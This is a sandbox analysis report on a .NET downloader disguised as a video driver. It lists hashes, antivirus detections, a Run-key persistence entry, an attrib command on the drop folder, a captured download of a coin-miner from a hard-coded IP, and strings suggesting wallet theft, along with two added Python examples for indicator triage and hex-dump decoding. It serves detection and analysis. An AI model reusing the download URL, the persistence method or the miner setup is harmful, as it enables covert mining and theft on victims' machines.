Analysis Date: 2013-12-23 13:04:40
MD5: 51381dfc55bef73328be1fe3856a43a9
SHA1: d56bfc24a9092fc2a02cc3564c769e230882ebd2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section .text: md5: 0144f0636f041fec02fd0eb6c30ad933 sha1: 6d214f9a7efedb356cf924c651de7c43489e4704 size: 13312
Section .rsrc: md5: 35d592f15ca4a31e90a17aa388d68655 sha1: e6b9af945bc14f2e4ec2f50ce084c74235d0cad6 size: 1024
Section .reloc: md5: cbea99d0d542559ffcd3e3ee5f3dc4c6 sha1: a7fc7b7393b3ba9afaf1f0a2aed85b7654609c8a size: 1024
Timestamp: 2013-12-15 18:56:22
Version info:
LegalCopyright:
Assembly Version: 1.0.0.0
InternalName: videodriverm.exe
FileVersion: 1.0.0.0
ProductVersion: 1.0.0.0
FileDescription:
OriginalFilename: videodriverm.exe
Packer: Microsoft Visual C# v7.0 / Basic .NET
PEhash: 0f52ac0f3cf8be34955c70a94d0f8ce57a9e83a8
AV avg: Generic35.ATNL
AV avira: TR/Downloader.A.974
AV mcafee: RDN/Generic Downloader.x!ja
AV msse: Trojan:MSIL/Remdobe.E

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverScan ➝ C:\Documents and Settings\Administrator\Application Data\VideoDrivers\videodriverm.exe\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\ROUTER
Creates File: PIPE\wkssvc
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\VideoDrivers\videodriver.exe
Creates Process: "C:\WINDOWS\system32\CMD.exe" /C attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers
Creates Process: dw20.exe -x -s 996
Creates Mutex: goblmah371z
Creates Mutex: Global\.net clr networking
Creates Mutex: Global\CLR_RESERVED_MUTEX_NAME
Starts Service: RASMAN

Process
↳ "C:\WINDOWS\system32\CMD.exe" /C attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers

Creates Process: attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers

Process
↳ Pid 800

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1108

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1804

Process
↳ Pid 1100

Process
↳ dw20.exe -x -s 996

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\dw.log
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\1874B.dmp
(dw20.exe is the Microsoft Error Reporting client that the .NET runtime launches on an unhandled exception; the dw.log and .dmp it wrote mean the sample crashed during this run, so behaviour after the crash point is not recorded here.)

Process
↳ attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers
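Host-side triage against the indicators recorded in the Runtime and Network Details above, as an added example (not part of the sandbox output). The indicators it matches are the ones on this page: the HKCU Run value DriverScan pointing into the Application Data\VideoDrivers drop folder, the cmd.exe /C attrib -s -h call on that folder (which clears the system and hidden attributes, it does not set them), the mutex goblmah371z, and the coin-miner.exe download URL. The pipe-delimited "kind|process|detail" event format and the sample events are constructed for the example and are not the output of any real sensor.

```python
"""Host-side triage against the indicators in the report above.

Added example, not part of the sandbox output.  The indicators (HKCU Run
value DriverScan, attrib -s -h on the VideoDrivers drop folder, mutex
goblmah371z, the payload URL) come from this report; the event format
"kind|process|detail" and the sample events are constructed for the example.
"""
import re

# Indicators taken from the report (compared case-insensitively).
RUN_KEY = r"software\microsoft\windows\currentversion\run"
RUN_VALUE = "driverscan"
DROP_DIR = r"application data\videodrivers"
MUTEX = "goblmah371z"
PAYLOAD_URL = "http://192.40.57.179/sovikat/coin-miner.exe"

# attrib invoked with both -s and -h, in either order.
ATTRIB_SH = re.compile(r"\battrib\b(?=.*\s-s\b)(?=.*\s-h\b)", re.IGNORECASE)

# Constructed sample events.  The malware.exe lines mirror entries from the
# report; the explorer.exe lines are benign filler to show the rules stay quiet
# on ordinary activity (including a Global\.net clr networking mutex, which is
# a normal CLR mutex and must not fire).
SAMPLE_EVENTS = r"""
registry|C:\malware.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverScan=C:\Documents and Settings\Administrator\Application Data\VideoDrivers\videodriverm.exe
process|C:\malware.exe|"C:\WINDOWS\system32\CMD.exe" /C attrib -s -h C:\Documents and Settings\Administrator\Application Data\VideoDrivers
mutex|C:\malware.exe|goblmah371z
mutex|C:\malware.exe|Global\.net clr networking
process|C:\WINDOWS\explorer.exe|"C:\WINDOWS\system32\notepad.exe" C:\notes.txt
registry|C:\WINDOWS\explorer.exe|HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass=1
network|C:\malware.exe|GET http://192.40.57.179/sovikat/coin-miner.exe
"""


def classify(event: str):
    """Return (rule, process, detail) if the event matches an indicator, else None."""
    parts = event.split("|", 2)
    if len(parts) != 3:
        return None
    kind, proc, detail = parts
    low = detail.lower()
    if kind == "registry":
        key, _, value = low.partition("=")
        parent, _, name = key.rpartition("\\")
        # Exactly the HKCU Run key (not RunOnce), value name DriverScan,
        # data pointing into the drop folder.
        if parent.endswith(RUN_KEY) and name == RUN_VALUE and DROP_DIR in value:
            return ("persistence_run_key", proc, detail)
    elif kind == "process":
        if ATTRIB_SH.search(detail) and DROP_DIR in low:
            return ("attrib_drop_dir", proc, detail)
    elif kind == "mutex":
        # Exact match only; substring matching would hit unrelated mutexes.
        if low == MUTEX:
            return ("mutex_goblmah371z", proc, detail)
    elif kind == "network":
        if PAYLOAD_URL in low:
            return ("payload_download", proc, detail)
    return None


def triage(log: str):
    """All indicator hits in a pipe-delimited event log."""
    events = (line for line in log.splitlines() if line.strip())
    return [hit for hit in map(classify, events) if hit]


def verdict(hits, threshold: int = 2):
    """Processes that matched at least `threshold` distinct rules, with the rules."""
    by_proc = {}
    for rule, proc, _ in hits:
        by_proc.setdefault(proc, set()).add(rule)
    return {p: sorted(r) for p, r in by_proc.items() if len(r) >= threshold}


if __name__ == "__main__":
    for proc, rules in verdict(triage(SAMPLE_EVENTS)).items():
        print(proc, "->", ", ".join(rules))
```

The threshold in verdict is there because a single hit (the attrib call alone, say) is weak on its own; the Run value, the attrib call on the same drop folder, the mutex and the download together are what make the dropper recognisable.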

Network Details:

HTTP GET: http://192.40.57.179/sovikat/coin-miner.exe
User-Agent: (none; the request carries no User-Agent header at all, see the raw capture below)
Flows TCP: 192.168.1.1:1032 ➝ 192.40.57.179:80

Raw Pcap
0x00000000 (00000)   47455420 2f736f76 696b6174 2f636f69   GET /sovikat/coi
0x00000010 (00016)   6e2d6d69 6e65722e 65786520 48545450   n-miner.exe HTTP
0x00000020 (00032)   2f312e31 0d0a486f 73743a20 3139322e   /1.1..Host: 192.
0x00000030 (00048)   34302e35 372e3137 390d0a43 6f6e6e65   40.57.179..Conne
0x00000040 (00064)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000050 (00080)   650d0a0d 0a                           e....
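Decoding the raw capture above back into the request it records, as an added example (not part of the sandbox output). The dump lines are copied from the Raw Pcap section; the 16-bytes-per-line layout (hex offset, decimal offset, up to four 4-byte hex groups, printable column) is assumed from that section, and the printable column is used as a cross-check so a printable word made of hex digits cannot be mistaken for data. The HTTP parsing is plain CRLF splitting; nothing here is the sample's own code.

```python
"""Decode the report's hex dump and parse the HTTP request it contains.

Added example; the dump text is copied from the Raw Pcap section above and the
16-bytes-per-line layout is assumed from that section.
"""
import re

RAW_PCAP = """\
0x00000000 (00000)   47455420 2f736f76 696b6174 2f636f69   GET /sovikat/coi
0x00000010 (00016)   6e2d6d69 6e65722e 65786520 48545450   n-miner.exe HTTP
0x00000020 (00032)   2f312e31 0d0a486f 73743a20 3139322e   /1.1..Host: 192.
0x00000030 (00048)   34302e35 372e3137 390d0a43 6f6e6e65   40.57.179..Conne
0x00000040 (00064)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000050 (00080)   650d0a0d 0a                           e....
"""

# Hex offset, decimal offset, then whitespace-separated hex groups; whatever
# follows the last hex group is the printable column.
DUMP_LINE = re.compile(
    r"^0x([0-9a-fA-F]{8}) \((\d+)\)\s+((?:[0-9a-fA-F]{2,8}(?=\s|$)\s*)+)"
)


def decode_hex_dump(dump: str, width: int = 16) -> bytes:
    """Reassemble the bytes of a dump in the page's format, validating as it goes."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        m = DUMP_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised dump line: {line!r}")
        offset = int(m.group(1), 16)
        if offset != int(m.group(2)) or offset != len(out):
            raise ValueError(f"offset mismatch at {line[:18]!r}")
        chunk = bytes.fromhex("".join(m.group(3).split()))
        if len(chunk) > width:
            raise ValueError(f"hex field ran into the printable column: {line!r}")
        # Printable bytes must agree with the rendered column; non-printable
        # bytes are shown as '.' there and are not checked.
        shown = line[m.end():]
        for b, c in zip(chunk, shown):
            if 0x20 <= b < 0x7F and chr(b) != c:
                raise ValueError(f"printable column disagrees with hex at offset {offset}")
        out += chunk
    return bytes(out)


def parse_http_request(data: bytes) -> dict:
    """Split an HTTP/1.x request into request line, headers (lower-cased names) and body."""
    head, sep, body = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request head not terminated by CRLF CRLF")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, version = request_line.decode("ascii").split(" ", 2)
    headers, order = {}, []
    for raw in header_lines:
        name, _, value = raw.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
        order.append(name.strip())
    return {"method": method, "target": target, "version": version,
            "headers": headers, "header_order": order, "body": body}


def summarize(req: dict) -> dict:
    """The fields worth keeping from a downloader's request: URL, UA, header order."""
    host = req["headers"].get("host", "")
    return {
        "url": f"http://{host}{req['target']}",
        "user_agent": req["headers"].get("user-agent"),  # None when no UA header is sent
        "header_order": req["header_order"],
        "body_len": len(req["body"]),
    }


if __name__ == "__main__":
    print(summarize(parse_http_request(decode_hex_dump(RAW_PCAP))))
```

The absent User-Agent together with the bare Host and Connection: Keep-Alive headers is the whole fingerprint of this request on the wire; a proxy or IDS rule for it should key on the missing header and the /sovikat/coin-miner.exe path rather than on a UA string.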


Strings
000004b0
1.0.0.0
appdata
Assembly Version
CGMiner.exe
diablo130302.cl
diakgcn121016.cl
DriverScan
FileDescription
FileVersion
InternalName
LegalCopyright
libcurl-4.dll
libeay32.dll
libidn-11.dll
librtmp.dll
libssh2.dll
OriginalFilename
 -p 
phatk121016.cl
poclbm130302.cl
ProductVersion
scrypt130511.cl
--scrypt -o
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ssleay32.dll
StringFileInfo
Translation
 -u 
VarFileInfo
videodriverm.exe
\VideoDrivers
\VideoDrivers\diablo130302.cl
\VideoDrivers\diakgcn121016.cl
\VideoDrivers\libcurl-4.dll
\VideoDrivers\libeay32.dll
\VideoDrivers\libidn-11.dll
\VideoDrivers\librtmp.dll
\VideoDrivers\libssh2.dll
\VideoDrivers\phatk121016.cl
\VideoDrivers\poclbm130302.cl
\VideoDrivers\scrypt130511.cl
\VideoDrivers\ssleay32.dll
\VideoDrivers\videodriverm.exe
\VideoDrivers\videodrivers.exe
\VideoDrivers\zlib1.dll
VS_VERSION_INFO
[WALLETTYPE]
zlib1.dll
1.0.0.0
4System.Web.Services.Protocols.SoapHttpClientProtocol
8.0.0.0
AccessControlType
Activator
AddAccessRule
add_Exited
Application
ApplicationBase
AssemblyCompanyAttribute
AssemblyCopyrightAttribute
AssemblyDescriptionAttribute
AssemblyFileVersionAttribute
AssemblyProductAttribute
AssemblyTitleAttribute
Attachment
AttachmentCollection
.cctor
ClearProjectError
Collection`1
CompilationRelaxationsAttribute
CompilerGeneratedAttribute
Computer
ComVisibleAttribute
Concat
Conversions
Convert
_CorExeMain
CreateDirectory
CreateInstance
Create__Instance__
DebuggerHiddenAttribute
Directory
DirectoryInfo
DirectorySecurity
Dispose__Instance__
DownloadFile
dwFlags
EditorBrowsableAttribute
EditorBrowsableState
Environ
Environment
Equals
EventArgs
EventHandler
Exception
Exists
FileSystemAccessRule
FileSystemRights
FileSystemSecurity
GeneratedCodeAttribute
get_Application
get_Attachments
get_Computer
GetCurrent
GetCurrentProcess
get_CurrentUser
get_FileName
get_GetInstance
GetHashCode
GetInstance
get_Length
get_MainModule
GetModuleFileName
GetModuleFileNameA
get_Name
GetObjectValue
get_Registry
get_StartInfo
get_To
GetType
GetTypeFromHandle
get_User
get_WebServices
HelpKeywordAttribute
HideModuleNameAttribute
hModule
ICredentialsByHost
InAttribute
InheritanceFlags
instance
Interaction
kernel32
lpExistingFileName
lpFileName
lpNewFileName
MailAddress
MailAddressCollection
MailMessage
m_AppObjectProvider
MarshalAsAttribute
m_ComputerObjectProvider
Microsoft.VisualBasic
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic.CompilerServices
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
Microsoft.Win32
m_MyWebServicesObjectProvider
<Module>
MoveFile
MoveFileExW
mscoree.dll
mscorlib
m_ThreadStaticValue
m_UserObjectProvider
MyApplication
My.Application
MyComputer
My.Computer
MyGroupCollectionAttribute
MyProject
MyTemplate
My.User
MyWebServices
My.WebServices
NetworkCredential
Object
OpenExisting
OpenSubKey
Process
ProcessModule
ProcessStartInfo
ProcessWindowStyle
ProjectData
PropagationFlags
RegistryKey
RegistryProxy
@.reloc
`.rsrc
RuntimeCompatibilityAttribute
RuntimeHelpers
RuntimeTypeHandle
sender
ServerComputer
set_Arguments
set_Body
set_CreateNoWindow
set_Credentials
set_EnableRaisingEvents
set_EnableSsl
set_FileName
set_From
set_Port
SetProjectError
set_StartInfo
set_Subject
SetValue
set_WindowStyle
SmtpClient
StandardModuleAttribute
STAThreadAttribute
String
Strings
#Strings
System
System.CodeDom.Compiler
System.Collections.ObjectModel
System.ComponentModel
System.ComponentModel.Design
System.Diagnostics
System.IO
System.Net
System.Net.Mail
System.Reflection
System.Runtime.CompilerServices
System.Runtime.InteropServices
System.Security.AccessControl
System.Security.Principal
System.Threading
!This program cannot be run in DOS mode.
Thread
ThreadSafeObjectProvider`1
ThreadStaticAttribute
ToChar
ToCharArray
ToInteger
ToString
UnmanagedType
v2.0.50727
videodriverm
videodriverm.exe
WalletSend
WebClient
WebServices
WindowsIdentity
WrapNonExceptionThrows